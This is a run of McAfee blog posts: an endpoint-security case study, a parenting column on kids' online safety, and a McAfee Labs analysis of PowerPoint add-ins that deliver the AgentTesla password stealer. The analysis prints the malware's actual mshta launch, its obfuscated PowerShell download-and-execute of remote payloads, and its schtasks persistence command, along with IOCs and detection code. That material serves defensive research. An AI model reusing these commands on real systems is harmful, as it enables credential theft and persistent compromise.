McAfee Enterprise Endpoint Security was instrumental in both simplifying and boosting endpoint protection, as multiple technologies—Threat Protection, Firewall, Web Control, and Adaptive Threat Prevention—are consolidated into a single agent. Leveraging threat data from local endpoints and McAfee Enterprise Global Threat Intelligence in the cloud, the telecom’s security team is also empowered to detect zero-day threats in near real time. When a threat is identified on a given endpoint, that information is automatically shared with all the other endpoints. And when an unknown or suspicious file is detected, it is immediately quarantined for analysis by MVISION EDR or the McAfee Endpoint Advanced Threat Defense sandbox.
Investigation had once been a lengthy and laborious manual process, often taking days or weeks. Sometimes detections of malicious activity were even ignored due to time constraints. But, after implementing MVISION EDR, things changed dramatically. Investigations and remediations now take as little as 10 to 15 minutes. The security team is catching more threats than ever before, their workflows are streamlined, and investigations are faster. Best of all, thanks to MVISION EDR, team members have expanded their threat-hunting capacity—without augmenting their staff.
Because McAfee Enterprise Advanced Threat Defense appliances and MVISION EDR are integrated with McAfee Enterprise SIEM solutions and McAfee Enterprise ePO software, suspicious activity at an endpoint automatically triggers an investigation. Advanced analytics and artificial intelligence (AI) in MVISION enable administrators to understand the alert, sort out the facts, and remediate any threat. MVISION EDR does all the preparatory work, gathering and distilling relevant data, such as IP addresses and information about devices and users. Graphic visualizations and AI-guided investigations help analysts quickly get a grasp on what’s happening. The security team can also run real-time queries to see if something similar has occurred anywhere else, and they can conduct historical searches for greater context.
“The volume of malware we have to deal with has definitely shrunk since implementing McAfee Enterprise Endpoint Security. But the addition of MVISION EDR has made an even bigger impact on security posture. When our endpoints do encounter malware, we can now respond many times faster and more effectively than ever before,” points out the security architect.
The enhanced McAfee Enterprise security architecture has transformed the telecom company’s approach to maintaining a more resilient security posture. The company is now taking a more proactive defense as a result of the new, fully coordinated McAfee Enterprise toolset.
In addition to advanced threat-hunting capabilities, the ability to share threat information across the organization via the Data Exchange Layer (DXL) has also contributed to a more proactive stance. For example, whenever a malicious file is identified, that information is automatically added to the McAfee Enterprise Threat Intelligence Exchange threat reputation database and shared with all DXL-connected systems: endpoints, SIEM, Advanced Threat Defense sandboxes, MVISION EDR software, and even the company’s Cisco pxGrid infrastructure, a multivendor, cross-platform network system that pulls together different parts of an IT infrastructure.
The European telecom company has plans to migrate to the cloud, beginning with Microsoft Office 365 and Microsoft Azure. For the time being, the organization plans to keep the McAfee Enterprise ePO management console on premises, but, in the very near future, the plan is to protect internet-only users with cloud-based MVISION ePO.
“Taking measured steps to augment our security infrastructure has helped us succeed at keeping our company and customers secure,” says the security architect. “It’s nice to know that McAfee Enterprise can support us wherever we are in our journey and can extend our integrated security infrastructure from device to cloud when we’re ready.”
The post European Telecom Company Expands Its Footprint to Better Protect Users and Customers appeared first on McAfee Blog.
Despite the old adage that it takes a village to raise a child, new research from McAfee shows that an overwhelming majority (80%) of Aussies believe schools should be taking the lead in teaching our kids about online safety.
At the time of the survey in April 2021, nearly 40% of Aussie households had at least one family member participating in online learning – a number that has most definitely increased in recent months as the Delta variant hit Australian shores causing many schools to shut.
But despite this turn of circumstances, nearly half (48%) of Aussies didn’t take any proactive security measures to protect their family/home when distance learning was introduced, with 34% saying they saw no increased risk to their children’s online safety.
Now, here’s the interesting thing – these same respondents nominated in the same survey that they were extremely worried about their kids’ exposure to scams (43%), sharing personal information (43%), illegal content (35%), cyber-bullying (40%) and misinformation (31%). Confusing, I know!
There’s no doubt that managing kids and home learning while trying to keep your day job and keep the household running is an extremely tough gig! In fact, I think thousands of Aussie parents will deserve medals after this chapter in our lives is over! But, I think these statistics aren’t just about being overwhelmed and a lack of energy – as 80% of surveyed Aussies nominated that they believe it is in fact the responsibility of schools to teach our kids how to be safe online. Only 8% considered cyber safety to be the responsibility of the parent.
If there is anyone who gets just how intense family life can be it’s me! With four boys, 2 cats, a dog (and an action-orientated husband) to manage, I have spent years living in chaos! And I understand that it can often feel like a relief knowing that something can be outsourced or managed by someone else. But, when it comes to something as important as our kids’ online safety, it’s essential that we put that top of our list. Forget about the ironing and focus on your kids’ digital lives instead. I’ve been an advocate of letting body heat remove wrinkles for years!
Even if your child’s school is teaching digital wellness, it’s imperative that these messages are also reinforced at home. Here’s what I recommend you do to get your family’s digital safety back on track:
Ensure the devices your kids are using for school or homework have up-to-date software and security settings. Software updates are usually designed to address security weaknesses so using outdated software can be quite risky!
Using weak and default passwords is, without a doubt, one of the easiest ways to get into trouble online. Ensure your kids have complex passwords for EACH of their online accounts and devices. Passwords should contain numbers, special characters and both lower- and upper-case letters. I’m a big fan of a crazy sentence. Why not consider a password manager like McAfee’s free True Key to help them generate and remember their passwords – I know I couldn’t survive without mine!
Why not consider using a VPN when your kids are accessing online learning services from home to protect the privacy of the internet connection? VPNs use bank-grade encryption to stop hackers from stealing personal information like passwords or data.
With both misinformation and disinformation a major concern for Aussie parents, it’s critical that we parents educate our kids about fake news: how to spot it and why they shouldn’t share it. Encouraging kids to question what they read or watch online before deciding whether it is to be believed and shared will help establish important digital critical thinking skills.
I’m a big fan of family dinners, even if it’s a humble bowl of spaghetti bolognese! In my opinion, it’s the perfect time to weave in messages of all types but particularly ones of a digital safety nature. Why not share stories of data breaches and what affected consumers had to do to prevent being hacked? Share news stories about new apps or scams, stories of kindness online, and digital citizenship you’ve witnessed online. Once you start sharing, you’ll likely find your kids want to share their stories too. But always keep calm and interested – otherwise they’ll stop talking!!
As a mum of four and cybersafety ambassador, I believe that a village approach is the absolute best way of setting our kids up for safe and positive interactions online. So, if you’re feeling unsure about what to tell your kids, spend some time educating yourself. We are lucky enough to have a dedicated eSafety Commissioner here in Australia who has a plethora of resources for Aussie parents. Spend some time checking it out, I promise it will be worth it!
Till next time, stay safe everyone!
Alex xx
The post “School Should Be Teaching Online Safety” says 80% of Aussie Parents appeared first on McAfee Blog.
Authored by Anuradha M
McAfee Labs have observed a new phishing campaign that utilizes the macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla, a well-known password stealer. These spam emails purport to be related to financial transactions.
AgentTesla is a RAT (Remote Access Trojan) that has been active since 2014. Attackers use this RAT as MaaS (Malware-as-a-Service) to steal user credentials and other information from victims through screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns.
During Q2 2021, we saw an increase in PowerPoint malware.
In this campaign, the spam email contains an attached file with a .ppam extension, which is a PowerPoint file containing VBA code. The lure used finance-related themes such as “New PO300093 Order”, as shown in Figure 2. The attachment filename is “300093.pdf.ppam”.
PPAM file:
This file type was introduced in 2007 with the release of Microsoft Office 2007. It is a PowerPoint macro-enabled Open XML add-in file. It contains components that add additional functionality, including extra commands, custom macros, and new tools for extending default PowerPoint functions.
Since PowerPoint supports ‘add-ins’ developed by third parties to add new features, attackers abuse this feature to automatically execute macros.
Technical Analysis:
Once the victim opens the “.ppam” file, a security notice pops up, as shown in Figure 3, to alert the user to the presence of macros.
As Figure 4 shows, the add-in nature of the file can be identified from the content of the [Content_Types].xml file inside the PPAM package.
The PPAM file contains the following files and directories, which can be seen upon extraction.
Once the victim enables the macro, the add-in is installed silently without the user’s knowledge, as seen in Figure 5. Seeing no content and no slides in PowerPoint, the user will close the file, but in the background the macro code has already executed and initiated the malicious activity.
As you can see in Figure 6, the macro is executed from the add-in’s auto_open() event, i.e., the macro fires immediately after the presentation is opened and the add-in is loaded.
On execution, the PowerPoint macro code launches a URL by invoking mshta.exe (Microsoft HTML Application), as shown in Figure 7. The mshta process is launched by PowerPoint by calling the CreateProcessA() API.
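The [Content_Types].xml check described above, as an added triage script that is not part of the original post: it opens a PPAM package (an OOXML zip), flags the add-in main part and any VBA project part, and flags a double extension such as 300093.pdf.ppam. The content-type strings are the standard OOXML ones and are assumed here, not quoted from the post; the sample package is constructed in-memory and is not the malicious file.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# Standard OOXML content types (assumed from the Open Packaging specs, not quoted from the post).
ADDIN_MAIN_TYPE = "application/vnd.ms-powerpoint.addin.macroEnabled.main+xml"
VBA_PROJECT_TYPE = "application/vnd.ms-office.vbaProject"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"


def triage_ppam(data, filename=""):
    """Static triage of a PPAM package: is it an add-in, does it carry a VBA
    project, and does its name use a double extension like 300093.pdf.ppam?"""
    result = {"is_addin": False, "has_vba": False, "vba_parts": [],
              "double_extension": False}
    pieces = filename.lower().split(".")
    result["double_extension"] = len(pieces) > 2 and pieces[-1] == "ppam"
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = pkg.namelist()
        if "[Content_Types].xml" in names:
            root = ET.fromstring(pkg.read("[Content_Types].xml"))
            for override in root.iter(CT_NS + "Override"):
                ctype = override.get("ContentType", "")
                if ctype == ADDIN_MAIN_TYPE:
                    result["is_addin"] = True
                elif ctype == VBA_PROJECT_TYPE:
                    result["has_vba"] = True
                    result["vba_parts"].append(override.get("PartName", ""))
        # Also catch a vbaProject.bin that is only mapped through a <Default> entry.
        for name in names:
            if name.lower().endswith("vbaproject.bin") and "/" + name not in result["vba_parts"]:
                result["has_vba"] = True
                result["vba_parts"].append("/" + name)
    return result


def build_sample_ppam():
    """Constructed minimal add-in package for testing; it is not the malicious sample."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'<Override PartName="/ppt/presentation.xml" ContentType="{ADDIN_MAIN_TYPE}"/>'
        f'<Override PartName="/ppt/vbaProject.bin" ContentType="{VBA_PROJECT_TYPE}"/>'
        '</Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", content_types)
        pkg.writestr("ppt/presentation.xml", "<p:presentation/>")
        pkg.writestr("ppt/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")  # OLE magic + filler
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_ppam(build_sample_ppam(), "300093.pdf.ppam"))
```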
Below are the parameters passed to CreateProcessA() API:
kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D,
Below is the command line parameter of mshta:
mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
The URL hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh redirects to “hxxps://p8hj[.]blogspot[.]com/p/27.html”, but “27.html” returned no response at the time of analysis.
Later, mshta.exe spawns powershell.exe as a child process.
Below are the command line parameters of PowerShell:
powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‘) -useB);
PowerShell downloads and executes script files from the above-mentioned URLs.
Figure 8 shows the content of the first URL, “hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt”:
Each downloaded PowerShell file stores two binary files in two huge arrays. The first is an EXE file that acts as a loader and the second is a DLL file, a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs given on the command line, decodes it, and launches MSBuild.exe, into which the payload is injected.
Scheduled Tasks:
To achieve persistence, the malware creates a scheduled task in “Task Scheduler” and drops a task file under C:\windows\system32\SECOTAKSA so that the campaign keeps running.
The new task is named “SECOTAKSA”. Its action is to execute the command “mshta hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html” and it runs every 80 minutes.
Below are the command line parameters of schtasks:
schtasks.exe - “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://1230948%1230948@0v2x.blogspot.com/p/27.html\“”
Infection Chain:
Process Tree:
Mitigation:
McAfee’s Endpoint Security (ENS) and Windows Systems Security (WSS) products have DAT coverage for this variant of malware.
This malicious PPAM document with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as “W97M/Downloader.dkw”.
The PPAM document is also blocked by the AMSI feature in ENS as AMSI-FKN!
Additionally, the Exploit Prevention feature in McAfee’s Endpoint Security product blocks the infection chain of this malware via the expert rule below, protecting our customers from this attack.
Expert Rule authored based on the below infection chain:
POWERPNT.EXE –> mshta.exe
Expert Rule:
Rule {
    Process {
        Include OBJECT_NAME { -v "powerpnt.exe" }
    }
    Target {
        Match PROCESS {
            Include OBJECT_NAME { -v "mshta.exe" }
            Include PROCESS_CMD_LINE { -v "**http**" }
            Include -access "CREATE"
        }
    }
}
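The same process chain (POWERPNT.EXE spawning mshta.exe with a URL, mshta.exe spawning PowerShell that downloads and evaluates remote script, and schtasks.exe registering an mshta task), expressed as an added detection routine over process-creation events. This is not McAfee code and is not the ENS expert rule itself; the event format and the sample events are constructed, with placeholder hosts in place of the real URLs.

```python
import re

# Straight and curly quotes; the observed command line splits tokens as i'E'x to evade matching.
QUOTES = "\"'\u2018\u2019\u201c\u201d"


def normalize(cmdline):
    """Drop quote characters and lower-case so i'E'x(iwr(...)) reads as iex(iwr(...))."""
    return cmdline.translate({ord(c): None for c in QUOTES}).lower()


def detect_chain(events):
    """Rules from the observed chain over events (dicts: pid, ppid, image, cmdline); returns (rule, pid)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img = e["image"].lower().rsplit("\\", 1)[-1]
        parent = by_pid.get(e["ppid"])
        pimg = parent["image"].lower().rsplit("\\", 1)[-1] if parent else ""
        cmd = normalize(e["cmdline"])
        # Rule 1: PowerPoint launching mshta with a URL (same condition as the ENS expert rule).
        if img == "mshta.exe" and pimg == "powerpnt.exe" and "http" in cmd:
            hits.append(("powerpnt_spawns_mshta_url", e["pid"]))
        # Rule 2: mshta launching PowerShell that downloads (iwr) and evaluates (iex) remote script.
        if (img == "powershell.exe" and pimg == "mshta.exe"
                and re.search(r"\b(iex|invoke-expression)\b", cmd)
                and re.search(r"\b(iwr|invoke-webrequest)\b", cmd)):
            hits.append(("mshta_spawns_powershell_download_exec", e["pid"]))
        # Rule 3: scheduled task whose action is mshta fetching a URL (persistence step).
        if img == "schtasks.exe" and "/create" in cmd and "/tr" in cmd \
                and "mshta" in cmd and "http" in cmd:
            hits.append(("schtasks_mshta_url_persistence", e["pid"]))
    return hits


# Constructed events mirroring the chain in the post; hosts are placeholders, not the real URLs.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmdline": r'"POWERPNT.EXE" "C:\Users\user\Downloads\300093.pdf.ppam"'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://shortener.example/placeholder"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe i\u2019E\u2019x(iwr(\u2018https://host.example/27-1.txt\u2018) -useB);"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc MINUTE /mo 80 /tn "SECOTAKSA" /F '
                '/tr "mshta http://host.example/p/27.html"'},
    # Benign control: mshta run on a local file with no URL and no PowerPoint parent.
    {"pid": 500, "ppid": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Windows\System32\local.hta"},
]
```

Running `detect_chain(SAMPLE_EVENTS)` flags pids 200, 300 and 400 and leaves the benign mshta event alone.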
IOCs
URLs:
hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html
hxxps://p8hj[.]blogspot[.]com/p/27.html
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt
EML files:
PPAM files:
Extracted AgentTesla files:
The post Malicious PowerPoint Documents on the Rise appeared first on McAfee Blog.